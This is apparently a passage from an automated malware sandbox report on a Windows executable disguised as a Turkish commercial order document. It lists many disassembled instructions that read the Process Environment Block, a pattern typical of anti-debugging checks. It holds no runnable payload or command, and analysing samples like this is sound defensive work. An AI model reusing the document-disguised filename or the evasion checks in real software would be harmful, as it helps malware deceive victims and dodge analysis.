Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D8324 mov eax, dword ptr fs:[00000030h]	6_2_012D8324
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D8324 mov ecx, dword ptr fs:[00000030h]	6_2_012D8324
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D8324 mov eax, dword ptr fs:[00000030h]	6_2_012D8324
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D8324 mov eax, dword ptr fs:[00000030h]	6_2_012D8324
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FC310 mov ecx, dword ptr fs:[00000030h]	6_2_011FC310
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123A30B mov eax, dword ptr fs:[00000030h]	6_2_0123A30B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123A30B mov eax, dword ptr fs:[00000030h]	6_2_0123A30B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123A30B mov eax, dword ptr fs:[00000030h]	6_2_0123A30B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01220310 mov ecx, dword ptr fs:[00000030h]	6_2_01220310
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A437C mov eax, dword ptr fs:[00000030h]	6_2_012A437C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01282349 mov eax, dword ptr fs:[00000030h]	6_2_01282349
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D634F mov eax, dword ptr fs:[00000030h]	6_2_012D634F
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128035C mov eax, dword ptr fs:[00000030h]	6_2_0128035C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128035C mov eax, dword ptr fs:[00000030h]	6_2_0128035C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128035C mov eax, dword ptr fs:[00000030h]	6_2_0128035C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128035C mov ecx, dword ptr fs:[00000030h]	6_2_0128035C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128035C mov eax, dword ptr fs:[00000030h]	6_2_0128035C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128035C mov eax, dword ptr fs:[00000030h]	6_2_0128035C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A8350 mov ecx, dword ptr fs:[00000030h]	6_2_012A8350
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CA352 mov eax, dword ptr fs:[00000030h]	6_2_012CA352
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011F8397 mov eax, dword ptr fs:[00000030h]	6_2_011F8397
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011F8397 mov eax, dword ptr fs:[00000030h]	6_2_011F8397
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011F8397 mov eax, dword ptr fs:[00000030h]	6_2_011F8397
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FE388 mov eax, dword ptr fs:[00000030h]	6_2_011FE388
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FE388 mov eax, dword ptr fs:[00000030h]	6_2_011FE388
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FE388 mov eax, dword ptr fs:[00000030h]	6_2_011FE388
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122438F mov eax, dword ptr fs:[00000030h]	6_2_0122438F
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122438F mov eax, dword ptr fs:[00000030h]	6_2_0122438F
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012103E9 mov eax, dword ptr fs:[00000030h]	6_2_012103E9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012103E9 mov eax, dword ptr fs:[00000030h]	6_2_012103E9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012103E9 mov eax, dword ptr fs:[00000030h]	6_2_012103E9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012103E9 mov eax, dword ptr fs:[00000030h]	6_2_012103E9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012103E9 mov eax, dword ptr fs:[00000030h]	6_2_012103E9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012103E9 mov eax, dword ptr fs:[00000030h]	6_2_012103E9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012103E9 mov eax, dword ptr fs:[00000030h]	6_2_012103E9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012103E9 mov eax, dword ptr fs:[00000030h]	6_2_012103E9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0121E3F0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0121E3F0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0121E3F0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012363FF mov eax, dword ptr fs:[00000030h]	6_2_012363FF
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0120A3C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0120A3C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0120A3C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0120A3C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0120A3C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0120A3C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012083C0 mov eax, dword ptr fs:[00000030h]	6_2_012083C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012083C0 mov eax, dword ptr fs:[00000030h]	6_2_012083C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012083C0 mov eax, dword ptr fs:[00000030h]	6_2_012083C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012083C0 mov eax, dword ptr fs:[00000030h]	6_2_012083C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012BC3CD mov eax, dword ptr fs:[00000030h]	6_2_012BC3CD
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012863C0 mov eax, dword ptr fs:[00000030h]	6_2_012863C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE3DB mov eax, dword ptr fs:[00000030h]	6_2_012AE3DB
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE3DB mov eax, dword ptr fs:[00000030h]	6_2_012AE3DB
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE3DB mov ecx, dword ptr fs:[00000030h]	6_2_012AE3DB
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE3DB mov eax, dword ptr fs:[00000030h]	6_2_012AE3DB
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A43D4 mov eax, dword ptr fs:[00000030h]	6_2_012A43D4
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A43D4 mov eax, dword ptr fs:[00000030h]	6_2_012A43D4
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011F823B mov eax, dword ptr fs:[00000030h]	6_2_011F823B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01204260 mov eax, dword ptr fs:[00000030h]	6_2_01204260
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01204260 mov eax, dword ptr fs:[00000030h]	6_2_01204260
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01204260 mov eax, dword ptr fs:[00000030h]	6_2_01204260
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FA250 mov eax, dword ptr fs:[00000030h]	6_2_011FA250
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0274 mov eax, dword ptr fs:[00000030h]	6_2_012B0274
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0274 mov eax, dword ptr fs:[00000030h]	6_2_012B0274
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0274 mov eax, dword ptr fs:[00000030h]	6_2_012B0274
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0274 mov eax, dword ptr fs:[00000030h]	6_2_012B0274
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0274 mov eax, dword ptr fs:[00000030h]	6_2_012B0274
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0274 mov eax, dword ptr fs:[00000030h]	6_2_012B0274
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0274 mov eax, dword ptr fs:[00000030h]	6_2_012B0274
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0274 mov eax, dword ptr fs:[00000030h]	6_2_012B0274
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0274 mov eax, dword ptr fs:[00000030h]	6_2_012B0274
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0274 mov eax, dword ptr fs:[00000030h]	6_2_012B0274
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0274 mov eax, dword ptr fs:[00000030h]	6_2_012B0274
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0274 mov eax, dword ptr fs:[00000030h]	6_2_012B0274
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01288243 mov eax, dword ptr fs:[00000030h]	6_2_01288243
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01288243 mov ecx, dword ptr fs:[00000030h]	6_2_01288243
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D625D mov eax, dword ptr fs:[00000030h]	6_2_012D625D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011F826B mov eax, dword ptr fs:[00000030h]	6_2_011F826B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01206259 mov eax, dword ptr fs:[00000030h]	6_2_01206259
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012BA250 mov eax, dword ptr fs:[00000030h]	6_2_012BA250
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012BA250 mov eax, dword ptr fs:[00000030h]	6_2_012BA250
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012102A0 mov eax, dword ptr fs:[00000030h]	6_2_012102A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012102A0 mov eax, dword ptr fs:[00000030h]	6_2_012102A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012962A0 mov eax, dword ptr fs:[00000030h]	6_2_012962A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012962A0 mov ecx, dword ptr fs:[00000030h]	6_2_012962A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012962A0 mov eax, dword ptr fs:[00000030h]	6_2_012962A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012962A0 mov eax, dword ptr fs:[00000030h]	6_2_012962A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012962A0 mov eax, dword ptr fs:[00000030h]	6_2_012962A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012962A0 mov eax, dword ptr fs:[00000030h]	6_2_012962A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E284 mov eax, dword ptr fs:[00000030h]	6_2_0123E284
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E284 mov eax, dword ptr fs:[00000030h]	6_2_0123E284
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01280283 mov eax, dword ptr fs:[00000030h]	6_2_01280283
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01280283 mov eax, dword ptr fs:[00000030h]	6_2_01280283
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01280283 mov eax, dword ptr fs:[00000030h]	6_2_01280283
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012102E1 mov eax, dword ptr fs:[00000030h]	6_2_012102E1
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012102E1 mov eax, dword ptr fs:[00000030h]	6_2_012102E1
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012102E1 mov eax, dword ptr fs:[00000030h]	6_2_012102E1
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0120A2C3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0120A2C3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0120A2C3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0120A2C3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0120A2C3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D62D6 mov eax, dword ptr fs:[00000030h]	6_2_012D62D6
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210535 mov eax, dword ptr fs:[00000030h]	6_2_01210535
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210535 mov eax, dword ptr fs:[00000030h]	6_2_01210535
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210535 mov eax, dword ptr fs:[00000030h]	6_2_01210535
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210535 mov eax, dword ptr fs:[00000030h]	6_2_01210535
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210535 mov eax, dword ptr fs:[00000030h]	6_2_01210535
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210535 mov eax, dword ptr fs:[00000030h]	6_2_01210535
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E53E mov eax, dword ptr fs:[00000030h]	6_2_0122E53E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E53E mov eax, dword ptr fs:[00000030h]	6_2_0122E53E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E53E mov eax, dword ptr fs:[00000030h]	6_2_0122E53E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E53E mov eax, dword ptr fs:[00000030h]	6_2_0122E53E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E53E mov eax, dword ptr fs:[00000030h]	6_2_0122E53E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01296500 mov eax, dword ptr fs:[00000030h]	6_2_01296500
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D4500 mov eax, dword ptr fs:[00000030h]	6_2_012D4500
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D4500 mov eax, dword ptr fs:[00000030h]	6_2_012D4500
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D4500 mov eax, dword ptr fs:[00000030h]	6_2_012D4500
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D4500 mov eax, dword ptr fs:[00000030h]	6_2_012D4500
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D4500 mov eax, dword ptr fs:[00000030h]	6_2_012D4500
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D4500 mov eax, dword ptr fs:[00000030h]	6_2_012D4500
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D4500 mov eax, dword ptr fs:[00000030h]	6_2_012D4500
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123656A mov eax, dword ptr fs:[00000030h]	6_2_0123656A
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123656A mov eax, dword ptr fs:[00000030h]	6_2_0123656A
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123656A mov eax, dword ptr fs:[00000030h]	6_2_0123656A
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01208550 mov eax, dword ptr fs:[00000030h]	6_2_01208550
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01208550 mov eax, dword ptr fs:[00000030h]	6_2_01208550
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012805A7 mov eax, dword ptr fs:[00000030h]	6_2_012805A7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012805A7 mov eax, dword ptr fs:[00000030h]	6_2_012805A7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012805A7 mov eax, dword ptr fs:[00000030h]	6_2_012805A7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012245B1 mov eax, dword ptr fs:[00000030h]	6_2_012245B1
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012245B1 mov eax, dword ptr fs:[00000030h]	6_2_012245B1
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01202582 mov eax, dword ptr fs:[00000030h]	6_2_01202582
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01202582 mov ecx, dword ptr fs:[00000030h]	6_2_01202582
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01234588 mov eax, dword ptr fs:[00000030h]	6_2_01234588
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E59C mov eax, dword ptr fs:[00000030h]	6_2_0123E59C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012025E0 mov eax, dword ptr fs:[00000030h]	6_2_012025E0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0122E5E7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0122E5E7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0122E5E7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0122E5E7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0122E5E7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0122E5E7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0122E5E7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0122E5E7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123C5ED mov eax, dword ptr fs:[00000030h]	6_2_0123C5ED
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123C5ED mov eax, dword ptr fs:[00000030h]	6_2_0123C5ED
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E5CF mov eax, dword ptr fs:[00000030h]	6_2_0123E5CF
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E5CF mov eax, dword ptr fs:[00000030h]	6_2_0123E5CF
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012065D0 mov eax, dword ptr fs:[00000030h]	6_2_012065D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0123A5D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0123A5D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01286420 mov eax, dword ptr fs:[00000030h]	6_2_01286420
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01286420 mov eax, dword ptr fs:[00000030h]	6_2_01286420
